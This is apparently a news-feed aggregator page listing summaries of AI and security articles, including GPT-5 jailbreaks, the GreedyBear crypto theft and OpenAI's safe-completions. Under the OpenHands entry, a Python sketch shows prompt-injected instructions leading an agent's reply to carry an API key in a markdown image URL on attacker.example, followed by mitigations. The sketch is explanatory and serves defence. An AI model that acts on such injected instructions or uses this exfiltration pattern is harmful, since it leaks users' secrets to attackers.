Tag: phi

  • Slashdot: $1M Stolen in ‘Industrial-Scale Crypto Theft’ Using AI-Generated Code

    Source URL: https://yro.slashdot.org/story/25/08/11/0037258/1m-stolen-in-industrial-scale-crypto-theft-using-ai-generated-code?utm_source=rss1.0mainlinkanon&utm_medium=feed
    Source: Slashdot
    Title: $1M Stolen in ‘Industrial-Scale Crypto Theft’ Using AI-Generated Code
    Feedly Summary: The text discusses a sophisticated cybercrime operation, GreedyBear, which utilizes a highly coordinated strategy, weaponizing browser extensions and phishing sites to facilitate industrial-scale crypto theft. The group’s innovative techniques, including the modification…

  • Simon Willison’s Weblog: Qwen3-4B-Thinking: "This is art – pelicans don’t ride bikes!"

    Source URL: https://simonwillison.net/2025/Aug/10/qwen3-4b/#atom-everything
    Source: Simon Willison’s Weblog
    Title: Qwen3-4B-Thinking: "This is art – pelicans don’t ride bikes!"
    Feedly Summary: I’ve fallen a few days behind keeping up with Qwen. They released two new 4B models last week: Qwen3-4B-Instruct-2507 and its thinking equivalent, Qwen3-4B-Thinking-2507. These are relatively tiny models that punch way above their weight. I’ve…

  • Docker: Remocal and Minimum Viable Models: Why Right-Sized Models Beat API Overkill

    Source URL: https://www.docker.com/blog/remocal-minimum-viable-models-ai/
    Source: Docker
    Title: Remocal and Minimum Viable Models: Why Right-Sized Models Beat API Overkill
    Feedly Summary: A practical approach to escaping the expensive, slow world of API-dependent AI. The $20K Monthly Reality Check: You built a simple sentiment analyzer for customer reviews. It works great. Except it costs $847/month in API calls…

  • Embrace The Red: OpenHands and the Lethal Trifecta: Leaking Your Agent’s Secrets

    Source URL: https://embracethered.com/blog/posts/2025/openhands-the-lethal-trifecta-strikes-again/
    Source: Embrace The Red
    Title: OpenHands and the Lethal Trifecta: Leaking Your Agent’s Secrets
    Feedly Summary: Another day, another AI data exfiltration exploit. Today we talk about OpenHands, formerly known as OpenDevin, created by All-Hands AI. OpenHands renders images in chat, which enables zero-click data exfiltration during prompt injection…
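
    The image-rendering exfiltration pattern the article describes can be sketched in a few lines of Python. This is illustrative only, not code from OpenHands: the attacker URL, the `d` query parameter, and the payload are all hypothetical. The point is that a chat UI which auto-renders markdown images will issue a GET for every image URL in a model reply, so injected instructions can smuggle secrets out in the URL with no user click:

    ```python
    import re
    from urllib.parse import urlparse, parse_qs

    # Hypothetical agent reply after a prompt-injection attack: the injected
    # instructions told the model to embed a secret in a markdown image URL.
    agent_reply = (
        "Here is the summary you asked for.\n"
        "![status](https://attacker.example/pixel.png?d=API_KEY_abc123)"
    )

    # A UI that auto-renders markdown images fetches every image URL it
    # finds in the reply -- no user interaction required ("zero-click").
    image_urls = re.findall(r"!\[[^\]]*\]\(([^)]+)\)", agent_reply)

    for url in image_urls:
        # The exfiltrated value rides along as a query parameter, so the
        # attacker's web server logs receive it the moment the UI renders.
        print(parse_qs(urlparse(url).query).get("d"))
    ```

    The usual mitigations follow directly from the sketch: render images only from an allow-listed set of domains, or strip/proxy image URLs in model output before the UI fetches them.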

  • Slashdot: Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ For Enterprise

    Source URL: https://it.slashdot.org/story/25/08/08/2113251/red-teams-jailbreak-gpt-5-with-ease-warn-its-nearly-unusable-for-enterprise?utm_source=rss1.0mainlinkanon&utm_medium=feed
    Source: Slashdot
    Title: Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ For Enterprise
    Feedly Summary: The text highlights significant security vulnerabilities in the newly released GPT-5 model, noting that it was easily jailbroken within a short timeframe. The results from different red-teaming efforts…

  • The Register: Meet President Willian H. Brusen from the great state of Onegon

    Source URL: https://www.theregister.com/2025/08/08/gpt-5-fake-presidents-states/
    Source: The Register
    Title: Meet President Willian H. Brusen from the great state of Onegon
    Feedly Summary: LLMs still struggle with accurate text within graphics. Hands on: OpenAI’s GPT-5, unveiled on Thursday, is supposed to be the company’s flagship model, offering better reasoning and more accurate responses than previous-gen products. But when…

  • Docker: Build a Recipe AI Agent with Koog and Docker

    Source URL: https://www.docker.com/blog/build-a-recipe-ai-agent-with-koog-and-docker/
    Source: Docker
    Title: Build a Recipe AI Agent with Koog and Docker
    Feedly Summary: Hi, I’m Philippe Charriere, a Principal Solutions Architect at Docker. I like to test new tools and see how they fit into real-world workflows. Recently, I set out to see if JetBrains’ Koog framework could run with Docker…

  • OpenAI: From hard refusals to safe-completions: toward output-centric safety training

    Source URL: https://openai.com/index/gpt-5-safe-completions
    Source: OpenAI
    Title: From hard refusals to safe-completions: toward output-centric safety training
    Feedly Summary: Discover how OpenAI’s new safe-completions approach in GPT-5 improves both safety and helpfulness in AI responses—moving beyond hard refusals to nuanced, output-centric safety training for handling dual-use prompts…